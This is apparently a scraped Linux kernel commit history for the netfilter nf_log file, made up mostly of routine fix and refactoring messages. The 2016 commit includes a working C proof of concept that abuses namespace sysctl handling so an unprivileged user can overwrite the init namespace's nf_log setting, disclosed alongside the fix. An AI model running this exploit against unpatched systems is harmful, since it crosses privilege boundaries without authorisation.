04 Oct, 2016
1 commit
-
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.Stash the "struct net *" in extra2 - data and extra1 are already used.
Repro code:
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#includechar child_stack[1000000];
uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
NULL))
err(1, "mount");/* Yes, we need to set the maps for the net sysctls to recognize us
* as namespace root.
*/
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}int main(void) {
outer_uid = getuid();
outer_gid = getgid();int child = clone(child_fn, child_stack + sizeof(child_stack),
CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
|CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}Repro:
$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONEBecause this looks like an issue with very low severity, I'm sending it to
the public list directly.Signed-off-by: Jann Horn
Signed-off-by: Pablo Neira Ayuso
30 Aug, 2016
1 commit
-
The nf_log_set is an interface function, so it should do the strict sanity
check of parameters. Convert the return value of nf_log_set as int instead
of void. When the pf is invalid, return -EOPNOTSUPP.Signed-off-by: Gao Feng
Signed-off-by: Pablo Neira Ayuso
05 Jul, 2016
1 commit
-
It is hard to unbind nf-logger:
echo NONE > /proc/sys/net/netfilter/nf_log/0
bash: echo: write error: No such file or directorysysctl -w net.netfilter.nf_log.0=NONE
sysctl: setting key "net.netfilter.nf_log.0": No such file or directory
net.netfilter.nf_log.0 = NONEYou need explicitly send '\0', for instance like:
echo -e "NONE\0" > /proc/sys/net/netfilter/nf_log/0
That seem to be strange, so fix it using proc_dostring.
Now it works fine:
modprobe nfnetlink_log
echo nfnetlink_log > /proc/sys/net/netfilter/nf_log/0
cat /proc/sys/net/netfilter/nf_log/0
nfnetlink_log
echo NONE > /proc/sys/net/netfilter/nf_log/0
cat /proc/sys/net/netfilter/nf_log/0
NONEv2: add missed error check for proc_dostring
Signed-off-by: Pavel Tikhomirov
Signed-off-by: Pablo Neira Ayuso
23 Jun, 2016
2 commits
-
If 'logger' was NULL, there would be a direct jump to the label 'out',
since it has already been checked for NULL, remove this unnecessary
check.Signed-off-by: Shivani Bhardwaj
Signed-off-by: Pablo Neira Ayuso -
When we request NFPROTO_INET, it means both NFPROTO_IPV4 and NFPROTO_IPV6.
Signed-off-by: Liping Zhang
Signed-off-by: Pablo Neira Ayuso
17 Sep, 2015
1 commit
-
The nf_log_unregister() function needs to call synchronize_rcu() to make sure
that the objects are not dereferenced anymore on module removal.Fixes: 5962815a6a56 ("netfilter: nf_log: use an array of loggers instead of list")
Signed-off-by: Pablo Neira Ayuso
14 Sep, 2015
1 commit
-
like nf_log_unset, nf_log_unregister must not reset the list of loggers.
Otherwise, a call to nf_log_unregister() will render loggers of other nf
protocols unusable:iptables -A INPUT -j LOG
modprobe nf_log_arp ; rmmod nf_log_arp
iptables -A INPUT -j LOG
iptables: No chain/target/match by that nameFixes: 30e0c6a6be ("netfilter: nf_log: prepare net namespace support for loggers")
Signed-off-by: Florian Westphal
Signed-off-by: Pablo Neira Ayuso
19 Mar, 2015
1 commit
-
Since fab4085 ("netfilter: log: nf_log_packet() as real unified
interface"), the loginfo structure that is passed to nf_log_packet() is
used to explicitly indicate the logger type you want to use.This is a problem for people tracing rules through nfnetlink_log since
packets are always routed to the NF_LOG_TYPE logger after the
aforementioned patch.We can fix this by removing the trace loginfo structures, but that still
changes the log level from 4 to 5 for tracing messages and there may be
someone relying on this outthere. So let's just introduce a new
nf_log_trace() function that restores the former behaviour.Reported-by: Markus Kötter
Signed-off-by: Pablo Neira Ayuso
23 Dec, 2014
1 commit
-
sizeof(char) is always 1.
Suggested-by: Joe Perches
Signed-off-by: Fabian Frederick
Signed-off-by: Pablo Neira Ayuso
12 Dec, 2014
1 commit
-
Pull networking updates from David Miller:
1) New offloading infrastructure and example 'rocker' driver for
offloading of switching and routing to hardware.This work was done by a large group of dedicated individuals, not
limited to: Scott Feldman, Jiri Pirko, Thomas Graf, John Fastabend,
Jamal Hadi Salim, Andy Gospodarek, Florian Fainelli, Roopa Prabhu2) Start making the networking operate on IOV iterators instead of
modifying iov objects in-situ during transfers. Thanks to Al Viro
and Herbert Xu.3) A set of new netlink interfaces for the TIPC stack, from Richard
Alpe.4) Remove unnecessary looping during ipv6 routing lookups, from Martin
KaFai Lau.5) Add PAUSE frame generation support to gianfar driver, from Matei
Pavaluca.6) Allow for larger reordering levels in TCP, which are easily
achievable in the real world right now, from Eric Dumazet.7) Add a variable of napi_schedule that doesn't need to disable cpu
interrupts, from Eric Dumazet.8) Use a doubly linked list to optimize neigh_parms_release(), from
Nicolas Dichtel.9) Various enhancements to the kernel BPF verifier, and allow eBPF
programs to actually be attached to sockets. From Alexei
Starovoitov.10) Support TSO/LSO in sunvnet driver, from David L Stevens.
11) Allow controlling ECN usage via routing metrics, from Florian
Westphal.12) Remote checksum offload, from Tom Herbert.
13) Add split-header receive, BQL, and xmit_more support to amd-xgbe
driver, from Thomas Lendacky.14) Add MPLS support to openvswitch, from Simon Horman.
15) Support wildcard tunnel endpoints in ipv6 tunnels, from Steffen
Klassert.16) Do gro flushes on a per-device basis using a timer, from Eric
Dumazet. This tries to resolve the conflicting goals between the
desired handling of bulk vs. RPC-like traffic.17) Allow userspace to ask for the CPU upon what a packet was
received/steered, via SO_INCOMING_CPU. From Eric Dumazet.18) Limit GSO packets to half the current congestion window, from Eric
Dumazet.19) Add a generic helper so that all drivers set their RSS keys in a
consistent way, from Eric Dumazet.20) Add xmit_more support to enic driver, from Govindarajulu
Varadarajan.21) Add VLAN packet scheduler action, from Jiri Pirko.
22) Support configurable RSS hash functions via ethtool, from Eyal
Perry.* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next: (1820 commits)
Fix race condition between vxlan_sock_add and vxlan_sock_release
net/macb: fix compilation warning for print_hex_dump() called with skb->mac_header
net/mlx4: Add support for A0 steering
net/mlx4: Refactor QUERY_PORT
net/mlx4_core: Add explicit error message when rule doesn't meet configuration
net/mlx4: Add A0 hybrid steering
net/mlx4: Add mlx4_bitmap zone allocator
net/mlx4: Add a check if there are too many reserved QPs
net/mlx4: Change QP allocation scheme
net/mlx4_core: Use tasklet for user-space CQ completion events
net/mlx4_core: Mask out host side virtualization features for guests
net/mlx4_en: Set csum level for encapsulated packets
be2net: Export tunnel offloads only when a VxLAN tunnel is created
gianfar: Fix dma check map error when DMA_API_DEBUG is enabled
cxgb4/csiostor: Don't use MASTER_MUST for fw_hello call
net: fec: only enable mdio interrupt before phy device link up
net: fec: clear all interrupt events to support i.MX6SX
net: fec: reset fep link status in suspend function
net: sock: fix access via invalid file descriptor
net: introduce helper macro for_each_cmsghdr
...
06 Nov, 2014
1 commit
-
The return value of seq_printf() is soon to be removed. Remove the
checks from seq_printf() in favor of seq_has_overflowed().Link: http://lkml.kernel.org/r/20141104142236.GA10239@salvia
Acked-by: Pablo Neira Ayuso
Cc: Patrick McHardy
Cc: Jozsef Kadlecsik
Cc: netfilter-devel@vger.kernel.org
Cc: coreteam@netfilter.org
Signed-off-by: Steven Rostedt
05 Nov, 2014
1 commit
-
net/netfilter/nf_log.c:157:16: warning: incorrect type in assignment (different address spaces)
net/netfilter/nf_log.c:157:16: expected struct nf_logger *logger
net/netfilter/nf_log.c:157:16: got struct nf_logger [noderef] *Signed-off-by: Pablo Neira Ayuso
30 Oct, 2014
2 commits
-
Currently, despite the comment right before the function,
nf_log_register allows registering two loggers on with the same type and
end up overwriting the previous register.Not a real issue today as current tree doesn't have two loggers for the
same type but it's better to get this protected.Also make sure that all of its callers do error checking.
Signed-off-by: Marcelo Ricardo Leitner
Signed-off-by: Pablo Neira Ayuso -
Wrap up a common call pattern in an easier to handle call.
Signed-off-by: Marcelo Ricardo Leitner
Signed-off-by: Pablo Neira Ayuso
14 Oct, 2014
1 commit
-
The kernel used to contain two functions for length-delimited,
case-insensitive string comparison, strnicmp with correct semantics and
a slightly buggy strncasecmp. The latter is the POSIX name, so strnicmp
was renamed to strncasecmp, and strnicmp made into a wrapper for the new
strncasecmp to avoid breaking existing users.To allow the compat wrapper strnicmp to be removed at some point in the
future, and to avoid the extra indirection cost, do
s/strnicmp/strncasecmp/g.Signed-off-by: Rasmus Villemoes
Cc: "David S. Miller"
Signed-off-by: Andrew Morton
Signed-off-by: Linus Torvalds
27 Jun, 2014
2 commits
-
This adds the generic plain text packet loggger for bridged packets.
It routes the logging message to the real protocol packet logger.
I decided not to refactor the ebt_log code for two reasons:1) The ebt_log output is not consistent with the IPv4 and IPv6
Netfilter packet loggers. The output is different for no good
reason and it adds redundant code to handle packet logging.2) To avoid breaking backward compatibility for applications
outthere that are parsing the specific ebt_log output, the ebt_log
output has been left as is. So only nftables will use the new
consistent logging format for logged bridged packets.More decisions coming in this patch:
1) This also removes ebt_log as default logger for bridged packets.
Thus, nf_log_packet() routes packet to this new packet logger
instead. This doesn't break backward compatibility since
nf_log_packet() is not used to log packets in plain text format
from anywhere in the ebtables/netfilter bridge code.2) The new bridge packet logger also performs a lazy request to
register the real IPv4, ARP and IPv6 netfilter packet loggers.
If the real protocol logger is no available (not compiled or the
module is not available in the system, not packet logging happens.Signed-off-by: Pablo Neira Ayuso
-
Before this patch, the nf_loginfo parameter specified the logging
configuration in case the specified default logger was loaded. This
patch updates the semantics of the nf_loginfo parameter in
nf_log_packet() which now indicates the logger that you explicitly
want to use.Thus, nf_log_packet() is exposed as an unified interface which
internally routes the log message to the corresponding logger type
by family.The module dependencies are expressed by the new nf_logger_find_get()
and nf_logger_put() functions which bump the logger module refcount.
Thus, you can not remove logger modules that are used by rules anymore.Another important effect of this change is that the family specific
module is only loaded when required. Therefore, xt_LOG and nft_log
will just trigger the autoload of the nf_log_{ip,ip6} modules
according to the family.Signed-off-by: Pablo Neira Ayuso
26 Jun, 2014
2 commits
-
This patch moves Eric Dumazet's log buffer implementation from the
xt_log.h header file to the core net/netfilter/nf_log.c. This also
includes the renaming of the structure and functions to avoid possible
undesired namespace clashes.This change allows us to use it from the arp and bridge packet logging
implementation in follow up patches. -
Now that legacy ulog targets are not available anymore in the tree, we
can have up to two possible loggers:1) The plain text logging via kernel logging ring.
2) The nfnetlink_log infrastructure which delivers log messages
to userspace.This patch replaces the list of loggers by an array of two pointers
per family for each possible logger and it also introduces a new field
to the nf_logger structure which indicates the position in the logger
array (based on the logger type).This prepares a follow up patch that consolidates the nf_log_packet()
interface by allowing to specify the logger as parameter.Signed-off-by: Pablo Neira Ayuso
13 Jun, 2013
1 commit
-
Reduce the uses of this unnecessary typedef.
Done via perl script:
$ git grep --name-only -w ctl_table net | \
xargs perl -p -i -e '\
sub trim { my ($local) = @_; $local =~ s/(^\s+|\s+$)//g; return $local; } \
s/\b(?<!struct\s)ctl_table\b(\s*\*\s*|\s+\w+)/"struct ctl_table " . trim($1)/ge'Reflow the modified lines that now exceed 80 columns.
Signed-off-by: Joe Perches
Signed-off-by: David S. Miller
06 Jun, 2013
1 commit
-
Conflicts:
net/netfilter/nf_log.cThe conflict in nf_log.c is that in 'net' we added CONFIG_PROC_FS
protection around foo_proc_entry() calls to fix a build failure,
whereas in Pablo's tree a guard if() test around a call is
remove_proc_entry() was removed. Trivially resolved.Pablo Neira Ayuso says:
====================
The following patchset contains the first batch of
Netfilter/IPVS updates for your net-next tree, they are:* Three patches with improvements and code refactorization
for nfnetlink_queue, from Florian Westphal.* FTP helper now parses replies without brackets, as RFC1123
recommends, from Jeff Mahoney.* Rise a warning to tell everyone about ULOG deprecation,
NFLOG has been already in the kernel tree for long time
and supersedes the old logging over netlink stub, from
myself.* Don't panic if we fail to load netfilter core framework,
just bail out instead, from myself.* Add cond_resched_rcu, used by IPVS to allow rescheduling
while walking over big hashtables, from Simon Horman.* Change type of IPVS sysctl_sync_qlen_max sysctl to avoid
possible overflow, from Zhang Yanfei.* Use strlcpy instead of strncpy to skip zeroing of already
initialized area to write the extension names in ebtables,
from Chen Gang.* Use already existing per-cpu notrack object from xt_CT,
from Eric Dumazet.* Save explicit socket lookup in xt_socket now that we have
early demux, also from Eric Dumazet.
====================Signed-off-by: David S. Miller
23 May, 2013
1 commit
-
Don't panic if we hit an error while adding the nf_log or pernet
netfilter support, just bail out.Signed-off-by: Pablo Neira Ayuso
Acked-by: Gao feng
15 May, 2013
1 commit
-
Since (69b34fb netfilter: xt_LOG: add net namespace support
for xt_LOG), we hit this:[ 4224.708977] BUG: unable to handle kernel NULL pointer dereference at 0000000000000388
[ 4224.709074] IP: [] ipt_log_packet+0x29/0x270when callling log functions from conntrack both in and out
are NULL i.e. the net pointer is invalid.Adding struct net *net in call to nf_logfn() will secure that
there always is a vaild net ptr.Reported as netfilter's bugzilla bug 818:
https://bugzilla.netfilter.org/show_bug.cgi?id=818Reported-by: Ronald
Signed-off-by: Hans Schillstrom
Signed-off-by: Pablo Neira Ayuso
06 May, 2013
1 commit
-
This patch fixes the following compilation error:
net/netfilter/nf_log.c:373:38: error: 'struct netns_nf' has no member named 'proc_netfilter'
if procfs is not set.
The netns support for nf_log, nfnetlink_log and nfnetlink_queue_core
requires CONFIG_PROC_FS in the removal path of their respective
/proc interface since net->nf.proc_netfilter is undefined in that
case.Reported-by: Fengguang Wu
Signed-off-by: Pablo Neira Ayuso
Acked-by: Gao feng
06 Apr, 2013
2 commits
-
After this patch, all nf_loggers support net namespace. Still
xt_LOG and ebt_log require syslog netns support.Signed-off-by: Gao feng
Signed-off-by: Pablo Neira Ayuso -
This patch adds netns support to nf_log and it prepares netns
support for existing loggers. It is composed of four major
changes.1) nf_log_register has been split to two functions: nf_log_register
and nf_log_set. The new nf_log_register is used to globally
register the nf_logger and nf_log_set is used for enabling
pernet support from nf_loggers.Per netns is not yet complete after this patch, it comes in
separate follow up patches.2) Add net as a parameter of nf_log_bind_pf. Per netns is not
yet complete after this patch, it only allows to bind the
nf_logger to the protocol family from init_net and it skips
other cases.3) Adapt all nf_log_packet callers to pass netns as parameter.
After this patch, this function only works for init_net.4) Make the sysctl net/netfilter/nf_log pernet.
Signed-off-by: Gao feng
Signed-off-by: Pablo Neira Ayuso
19 Nov, 2012
1 commit
-
Some comments misspell "registered"; this fixes them. No code changes.
Signed-off-by: Adam Buchbinder
Signed-off-by: Jiri Kosina
21 Apr, 2012
2 commits
-
This results in code with less boiler plate that is a bit easier
to read.Additionally stops us from using compatibility code in the sysctl
core, hastening the day when the compatibility code can be removed.Signed-off-by: Eric W. Biederman
Acked-by: Pavel Emelyanov
Signed-off-by: David S. Miller -
This makes it clearer which sysctls are relative to your current network
namespace.This makes it a little less error prone by not exposing sysctls for the
initial network namespace in other namespaces.This is the same way we handle all of our other network interfaces to
userspace and I can't honestly remember why we didn't do this for
sysctls right from the start.Signed-off-by: Eric W. Biederman
Acked-by: Pavel Emelyanov
Signed-off-by: David S. Miller
13 Jan, 2012
1 commit
-
commit a9b3cd7f32 (rcu: convert uses of rcu_assign_pointer(x, NULL) to
RCU_INIT_POINTER) did a lot of incorrect changes, since it did a
complete conversion of rcu_assign_pointer(x, y) to RCU_INIT_POINTER(x,
y).We miss needed barriers, even on x86, when y is not NULL.
Signed-off-by: Eric Dumazet
CC: Stephen Hemminger
CC: Paul E. McKenney
Signed-off-by: David S. Miller
02 Aug, 2011
1 commit
-
When assigning a NULL value to an RCU protected pointer, no barrier
is needed. The rcu_assign_pointer, used to handle that but will soon
change to not handle the special case.Convert all rcu_assign_pointer of NULL value.
//smpl
@@ expression P; @@- rcu_assign_pointer(P, NULL)
+ RCU_INIT_POINTER(P, NULL)//
Signed-off-by: Stephen Hemminger
Acked-by: Paul E. McKenney
Signed-off-by: David S. Miller
04 Mar, 2011
1 commit
-
Conflicts:
drivers/net/bnx2x/bnx2x.h
02 Mar, 2011
1 commit
-
Like many other places, we have to check that the array index is
within allowed limits, or otherwise, a kernel oops and other nastiness
can ensue when we access memory beyond the end of the array.[ 5954.115381] BUG: unable to handle kernel paging request at 0000004000000000
[ 5954.120014] IP: __find_logger+0x6f/0xa0
[ 5954.123979] nf_log_bind_pf+0x2b/0x70
[ 5954.123979] nfulnl_recv_config+0xc0/0x4a0 [nfnetlink_log]
[ 5954.123979] nfnetlink_rcv_msg+0x12c/0x1b0 [nfnetlink]
...The problem goes back to v2.6.30-rc1~1372~1342~31 where nf_log_bind
was decoupled from nf_log_register.Reported-by: Miguel Di Ciurcio Filho ,
via irc.freenode.net/#netfilter
Signed-off-by: Jan Engelhardt
Signed-off-by: Patrick McHardy
16 Nov, 2010
1 commit
-
Add some __rcu annotations and use helpers to reduce number of sparse
warnings (CONFIG_SPARSE_RCU_POINTER=y)Signed-off-by: Eric Dumazet
Signed-off-by: Patrick McHardy
20 Aug, 2010
1 commit
-
Signed-off-by: Arnd Bergmann
Signed-off-by: Paul E. McKenney
Acked-by: Patrick McHardy
Cc: "David S. Miller"
Cc: Eric Dumazet
Reviewed-by: Josh Triplett
11 May, 2010
1 commit
-
Restore the rcu_dereference() calls in conntrack/expectation notifier
and logger registration/unregistration, but use the _protected variant,
which will be required by the upcoming __rcu annotations.Based on patch by Eric Dumazet
Signed-off-by: Patrick McHardy
09 Apr, 2010
1 commit
-
The CONFIG_PROVE_RCU option discovered a few invalid uses of
rcu_dereference() in netfilter. In all these cases, the code code
intends to check whether a pointer is already assigned when
performing registration or whether the assigned pointer matches
when performing unregistration. The entire registration/
unregistration is protected by a mutex, so we don't need the
rcu_dereference() calls.Reported-by: Valdis Kletnieks
Tested-by: Valdis Kletnieks
Signed-off-by: Patrick McHardy
08 Dec, 2009
1 commit
-
* git://git.kernel.org/pub/scm/linux/kernel/git/ebiederm/sysctl-2.6: (43 commits)
security/tomoyo: Remove now unnecessary handling of security_sysctl.
security/tomoyo: Add a special case to handle accesses through the internal proc mount.
sysctl: Drop & in front of every proc_handler.
sysctl: Remove CTL_NONE and CTL_UNNUMBERED
sysctl: kill dead ctl_handler definitions.
sysctl: Remove the last of the generic binary sysctl support
sysctl net: Remove unused binary sysctl code
sysctl security/tomoyo: Don't look at ctl_name
sysctl arm: Remove binary sysctl support
sysctl x86: Remove dead binary sysctl support
sysctl sh: Remove dead binary sysctl support
sysctl powerpc: Remove dead binary sysctl support
sysctl ia64: Remove dead binary sysctl support
sysctl s390: Remove dead sysctl binary support
sysctl frv: Remove dead binary sysctl support
sysctl mips/lasat: Remove dead binary sysctl support
sysctl drivers: Remove dead binary sysctl support
sysctl crypto: Remove dead binary sysctl support
sysctl security/keys: Remove dead binary sysctl support
sysctl kernel: Remove binary sysctl logic
...
20 Nov, 2009
1 commit
-
[ 171.925285] BUG: sleeping function called from invalid context at kernel/mutex.c:280
[ 171.925296] in_atomic(): 1, irqs_disabled(): 0, pid: 671, name: grep
[ 171.925306] 2 locks held by grep/671:
[ 171.925312] #0: (&p->lock){+.+.+.}, at: [] seq_read+0x25/0x36c
[ 171.925340] #1: (rcu_read_lock){.+.+..}, at: [] seq_start+0x0/0x44
[ 171.925372] Pid: 671, comm: grep Not tainted 2.6.31.6-4-netbook #3
[ 171.925380] Call Trace:
[ 171.925398] [] ? __debug_show_held_locks+0x1e/0x20
[ 171.925414] [] __might_sleep+0xfb/0x102
[ 171.925430] [] mutex_lock_nested+0x1c/0x2ad
[ 171.925444] [] seq_show+0x74/0x127
[ 171.925456] [] seq_read+0x1b4/0x36c
[ 171.925469] [] ? seq_read+0x0/0x36c
[ 171.925483] [] proc_reg_read+0x60/0x74
[ 171.925496] [] ? proc_reg_read+0x0/0x74
[ 171.925510] [] vfs_read+0x87/0x110
[ 171.925523] [] sys_read+0x3b/0x60
[ 171.925538] [] syscall_call+0x7/0xbFix it by replacing RCU with nf_log_mutex.
Reported-by: "Yin, Kangkai"
Signed-off-by: Wu Fengguang
Signed-off-by: Patrick McHardy
Signed-off-by: David S. Miller
12 Nov, 2009
1 commit
-
Now that sys_sysctl is a compatiblity wrapper around /proc/sys
all sysctl strategy routines, and all ctl_name and strategy
entries in the sysctl tables are unused, and can be
revmoed.In addition neigh_sysctl_register has been modified to no longer
take a strategy argument and it's callers have been modified not
to pass one.Cc: "David Miller"
Cc: Hideaki YOSHIFUJI
Cc: netdev@vger.kernel.org
Signed-off-by: Eric W. Biederman